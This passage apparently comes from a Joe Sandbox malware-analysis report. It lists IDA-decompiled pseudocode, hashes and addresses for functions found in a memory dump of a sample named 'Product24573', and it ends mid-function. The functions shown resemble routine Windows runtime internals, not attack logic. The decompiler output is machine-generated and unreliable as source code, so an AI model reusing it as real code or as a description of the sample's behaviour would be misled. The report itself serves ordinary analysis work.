                                          • Instruction ID: 03433727d19f8dc93a6ae61fd7d85526b0afb76e1d43b4407cb69985feb76a13
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: 17316B72A4158BBFD71DEBB4C480BEEFB64BF62208F04416AD41C47245DB786916C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01177016 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E01177016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x11ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01176B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01176B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01117D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01139AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0113B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01114620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                          0x01177016
                                          0x0117701e
                                          0x0117702b
                                          0x01177033
                                          0x01177037
                                          0x0117703c
                                          0x0117703e
                                          0x01177041
                                          0x01177045
                                          0x0117704a
                                          0x01177050
                                          0x01177055
                                          0x0117705a
                                          0x01177062
                                          0x01177062
                                          0x0117705a
                                          0x01177064
                                          0x01177064
                                          0x01177067
                                          0x01177071
                                          0x01177096
                                          0x0117709b
                                          0x011770a2
                                          0x011770a6
                                          0x011770a7
                                          0x011770ad
                                          0x011770b3
                                          0x011770b6
                                          0x011770bb
                                          0x011770c3
                                          0x011770c3
                                          0x011770c6
                                          0x011770cd
                                          0x011770dd
                                          0x011770e0
                                          0x011770e2
                                          0x011770e2
                                          0x011770ee
                                          0x01177101
                                          0x011770f0
                                          0x011770f9
                                          0x011770f9
                                          0x0117710a
                                          0x0117710e
                                          0x01177112
                                          0x01177117
                                          0x01177118
                                          0x01177118
                                          0x011770bb
                                          0x0117711d
                                          0x01177123
                                          0x01177131
                                          0x01177131
                                          0x01177136
                                          0x0117713d
                                          0x0117713e
                                          0x0117713f
                                          0x0117714a
                                          0x0117714a
                                          0x01177084
                                          0x01177088
                                          0x00000000
                                          0x0117708e
                                          0x0117708e
                                          0x01177092
                                          0x00000000
                                          0x01177092

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ab21f8aa671a4a4efe649206962c946d05086e2fa41d29c51b0080c60694f11
                                          • Instruction ID: 0b0fc402138d5139adf604e0319649409024f8d2c9cd4b23daa026ce7310a0e9
                                          • Opcode Fuzzy Hash: 6ab21f8aa671a4a4efe649206962c946d05086e2fa41d29c51b0080c60694f11
                                          • Instruction Fuzzy Hash: 6131E2726047419BC329DF68D844A6AB7F9BFC8704F044A29F995877D0E730E904CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011A3D40 Relevance: .1, Instructions: 98COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E011A3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x11ed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E01112280(_t34, 0x11e8a6c);
				_t64 =  *0x11e5768; // 0x77995768
				if(_t64 != 0x11e5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77995770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0110FFB0(_t53, _t64, 0x11e8a6c);
						 *0x11eb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E01112280(_t45, 0x11e8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x11e5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0110FFB0(_t51, _t64, 0x11e8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0113B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                          0x011a3d40
                                          0x011a3d48
                                          0x011a3d52
                                          0x011a3d59
                                          0x011a3d5d
                                          0x011a3d61
                                          0x011a3d63
                                          0x011a3d67
                                          0x011a3d69
                                          0x011a3d72
                                          0x011a3d76
                                          0x011a3d7a
                                          0x011a3d7f
                                          0x011a3d8b
                                          0x011a3d91
                                          0x011a3d91
                                          0x011a3d91
                                          0x011a3d94
                                          0x011a3d96
                                          0x011a3d9d
                                          0x011a3da1
                                          0x011a3db0
                                          0x011a3dba
                                          0x011a3dbc
                                          0x011a3dbc
                                          0x011a3dc6
                                          0x011a3dcb
                                          0x011a3dcf
                                          0x011a3dd1
                                          0x011a3dd4
                                          0x00000000
                                          0x00000000
                                          0x011a3dd9
                                          0x011a3e0c
                                          0x011a3e0c
                                          0x011a3e0f
                                          0x011a3ddb
                                          0x011a3ddb
                                          0x011a3de0
                                          0x00000000
                                          0x011a3de2
                                          0x011a3de2
                                          0x011a3de4
                                          0x011a3de8
                                          0x011a3deb
                                          0x011a3df1
                                          0x00000000
                                          0x011a3df3
                                          0x011a3df3
                                          0x011a3df5
                                          0x011a3df8
                                          0x011a3dfa
                                          0x00000000
                                          0x011a3dfa
                                          0x011a3df1
                                          0x011a3de0
                                          0x011a3e11
                                          0x011a3e11
                                          0x00000000
                                          0x011a3dfe
                                          0x011a3e04
                                          0x011a3e06
                                          0x00000000
                                          0x011a3e06
                                          0x00000000
                                          0x011a3e04
                                          0x011a3d91
                                          0x011a3e15
                                          0x011a3e1a
                                          0x011a3e1f
                                          0x011a3e1f
                                          0x011a3e23
                                          0x011a3e29
                                          0x00000000
                                          0x00000000
                                          0x011a3e2e
                                          0x00000000
                                          0x011a3e30
                                          0x011a3e30
                                          0x011a3e35
                                          0x00000000
                                          0x011a3e37
                                          0x011a3e3e
                                          0x011a3e42
                                          0x011a3e48
                                          0x011a3e4e
                                          0x00000000
                                          0x011a3e4e
                                          0x011a3e35
                                          0x00000000
                                          0x011a3e2e
                                          0x011a3e5b
                                          0x011a3e5c
                                          0x011a3e5d
                                          0x011a3e68
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e2dbf227d1d9479df045bfcabb7e6287aae74e6030a4e30cae4bd4277c04efc
                                          • Instruction ID: 7b27e0cbed026da659a713ccac65495093599ee1228fee1a965c4e11ce80e480
                                          • Opcode Fuzzy Hash: 6e2dbf227d1d9479df045bfcabb7e6287aae74e6030a4e30cae4bd4277c04efc
                                          • Instruction Fuzzy Hash: 6431A975909302CFC718CF68C584A5ABFE1FF85618F84886EE5A89B241D730DD04CBE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112A70E Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0112A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x11e7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x11e7b10 = 8;
					 *0x11e7b14 = 0x11e7b0c;
					 *0x11e7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0112A990(0x11e7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0112A840(__edx, __ecx, __ecx, _t52, 0x11e7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x11e7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x11e7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x11e7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01114620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x11e7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0113F3E0(_t50,  *0x11e7b14, _t8 >> 3);
						_t28 =  *0x11e7b14; // 0x0
						__eflags = _t28 - 0x11e7b0c;
						if(_t28 != 0x11e7b0c) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x11e7b14 = _t50;
						_t48 = _v12;
						 *0x11e7b10 = _t9;
						goto L6;
					}
					 *0x11e7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                          0x0112a713
                                          0x0112a714
                                          0x0112a717
                                          0x0112a71d
                                          0x0112a720
                                          0x0112a722
                                          0x0112a727
                                          0x0112a74a
                                          0x0112a754
                                          0x0112a75e
                                          0x0112a768
                                          0x0112a76a
                                          0x0112a773
                                          0x0112a78b
                                          0x0112a790
                                          0x0112a792
                                          0x0112a741
                                          0x0112a741
                                          0x0112a743
                                          0x0112a749
                                          0x0112a749
                                          0x0112a732
                                          0x0112a73a
                                          0x0112a797
                                          0x0112a79d
                                          0x0112a7a3
                                          0x0112a7a9
                                          0x0112a7b6
                                          0x0112a7bc
                                          0x0112a7ca
                                          0x0112a7e0
                                          0x0112a7e2
                                          0x0112a7e4
                                          0x01169bf2
                                          0x00000000
                                          0x01169bf2
                                          0x0112a7ed
                                          0x0112a7f2
                                          0x0112a800
                                          0x0112a805
                                          0x0112a80d
                                          0x0112a812
                                          0x01169c08
                                          0x01169c08
                                          0x0112a818
                                          0x0112a81b
                                          0x0112a821
                                          0x0112a824
                                          0x00000000
                                          0x0112a824
                                          0x0112a7ae
                                          0x00000000
                                          0x0112a7ae
                                          0x0112a73c
                                          0x0112a73e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693313e053bd76aecd8174c3e816e052cd1f6fbd6749e7f02c7c3f23d306c8ac
                                          • Instruction ID: 64514b91262a32056e11f878e76d9da028d6e2ef7c74f3b8e1ed345bce3b248c
                                          • Opcode Fuzzy Hash: 693313e053bd76aecd8174c3e816e052cd1f6fbd6749e7f02c7c3f23d306c8ac
                                          • Instruction Fuzzy Hash: 4F31E1B1600611DFEB2DCF88F880F157BF9FB84700F040969E2258B684D3719991CBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011261A0 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E011261A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01125E50(0x10d67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E011C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E010FF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                          0x011261b3
                                          0x011261b5
                                          0x011261bd
                                          0x011261c3
                                          0x011261c7
                                          0x011261d2
                                          0x011261ff
                                          0x011261ff
                                          0x01126201
                                          0x01126207
                                          0x01126207
                                          0x011261d4
                                          0x011261d9
                                          0x00000000
                                          0x00000000
                                          0x011261df
                                          0x011261e2
                                          0x00000000
                                          0x00000000
                                          0x011261e6
                                          0x011261e8
                                          0x011261ee
                                          0x011261ee
                                          0x011261f9
                                          0x0116762f
                                          0x01167632
                                          0x01167635
                                          0x01167639
                                          0x01167640
                                          0x0116766e
                                          0x01167675
                                          0x00000000
                                          0x00000000
                                          0x01167681
                                          0x01167689
                                          0x0116768d
                                          0x01167691
                                          0x01167695
                                          0x01167699
                                          0x011676af
                                          0x011676b5
                                          0x011676b7
                                          0x011676b7
                                          0x011676d7
                                          0x011676dc
                                          0x00000000
                                          0x011676dc
                                          0x011676a2
                                          0x011676a9
                                          0x01167651
                                          0x01167653
                                          0x01167653
                                          0x01167656
                                          0x01167656
                                          0x00000000
                                          0x01167656
                                          0x01167644
                                          0x01167646
                                          0x01167648
                                          0x01167648
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 995d0d059a0d5c0f35d50a2927bdeed5d9a6d5e9a4a50330d49bfa9930adbd77
                                          • Instruction ID: 05ea8d8e2f811c821c10197ab91f9de2e39dd0fbe4be05630d5bb812f6dae159
                                          • Opcode Fuzzy Hash: 995d0d059a0d5c0f35d50a2927bdeed5d9a6d5e9a4a50330d49bfa9930adbd77
                                          • Instruction Fuzzy Hash: 9B31AE716053118FE328CF0DC800B26BBE9FB98B04F15496DE9949B391E771EC14CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FAA16 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E010FAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x11ed360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x11e7b9c; // 0x0
					_t53 = L01114620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0113B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0113F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01106C59(_t53, _t51, _t58) != 0) {
							_t28 = E01125E50(0x10dc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0112B230(_v32, _v28, 0x10dc2d8, 1,  &_v24);
								_t28 = E010FF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                          0x010faa25
                                          0x010faa29
                                          0x010faa2d
                                          0x010faa30
                                          0x010faa37
                                          0x010faa3c
                                          0x01154458
                                          0x01154458
                                          0x01154472
                                          0x01154474
                                          0x01154476
                                          0x010faa64
                                          0x010faa74
                                          0x0115447c
                                          0x01154483
                                          0x01154492
                                          0x010faa52
                                          0x010faa54
                                          0x010faa5e
                                          0x011544a8
                                          0x011544ad
                                          0x011544af
                                          0x011544b6
                                          0x011544b6
                                          0x011544b9
                                          0x011544bc
                                          0x011544cd
                                          0x011544d3
                                          0x011544d6
                                          0x011544e1
                                          0x011544e1
                                          0x011544e6
                                          0x011544e8
                                          0x011544fb
                                          0x011544fb
                                          0x011544e8
                                          0x00000000
                                          0x010faa5e
                                          0x01154476
                                          0x010faa42
                                          0x010faa46
                                          0x010faa48
                                          0x010faa4c
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97336a18bd6c5483e2ae9bc15313245c12cda352159532c473b73c0eeca60254
                                          • Instruction ID: ce5bb344057528af10f64ab7896ee15a7f28921091b58db0d0144f6a496d2ebd
                                          • Opcode Fuzzy Hash: 97336a18bd6c5483e2ae9bc15313245c12cda352159532c473b73c0eeca60254
                                          • Instruction Fuzzy Hash: 50310571A0021AEBCF199FA8CD42ABFB7B9EF04700F04406DF915EB640E7349950C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01134A2C Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E01134A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x11ed360 ^ _t62;
				_v8 =  *0x11ed360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01112280(_t26, 0x11e8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0110FFB0(_t41, _t51, 0x11e8608);
						L2:
						 *0x11eb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0113B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01112280(_t28, 0x11e8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0110FFB0(_t42, _t53, 0x11e8608);
							if(_t53 != 0) {
								L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0110FFB0(_t41, _t51, 0x11e8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                          0x01134a2c
                                          0x01134a34
                                          0x01134a3c
                                          0x01134a3e
                                          0x01134a48
                                          0x01134a4b
                                          0x01134a4d
                                          0x01134a51
                                          0x01134a9c
                                          0x00000000
                                          0x00000000
                                          0x01134aa3
                                          0x01134aa8
                                          0x01134aad
                                          0x01134ab1
                                          0x01134ade
                                          0x01134ae3
                                          0x01134a5a
                                          0x01134a62
                                          0x01134a6a
                                          0x01134a6e
                                          0x0116f203
                                          0x01134a84
                                          0x01134a88
                                          0x01134a89
                                          0x01134a8a
                                          0x01134a95
                                          0x01134a95
                                          0x01134a79
                                          0x01134a80
                                          0x01134af2
                                          0x01134af4
                                          0x01134af9
                                          0x01134aff
                                          0x01134b01
                                          0x01134b03
                                          0x01134b08
                                          0x0116f20a
                                          0x0116f212
                                          0x0116f216
                                          0x0116f216
                                          0x01134b08
                                          0x01134b13
                                          0x01134b1a
                                          0x0116f229
                                          0x0116f229
                                          0x01134b1a
                                          0x01134a82
                                          0x00000000
                                          0x01134a82
                                          0x01134ab7
                                          0x01134acd
                                          0x01134acd
                                          0x01134ad5
                                          0x01134ada
                                          0x00000000
                                          0x01134ada
                                          0x01134ac2
                                          0x01134acb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01134acb
                                          0x01134a53
                                          0x01134a53
                                          0x01134a58
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ecbef058049cbd5327a84801b36fcf19e4bd912181e500a44c050019e335b2d
                                          • Instruction ID: b6d4f10bbc0b9c1e8089bc8450ae75b01b2a02fbddbae43730b3537097dbe4af
                                          • Opcode Fuzzy Hash: 3ecbef058049cbd5327a84801b36fcf19e4bd912181e500a44c050019e335b2d
                                          • Instruction Fuzzy Hash: 86310032205612DBD73EDF98C944B2ABBE5FFC5B14F01042DE8564BA49CBB0D802CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01138EC7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E01138EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
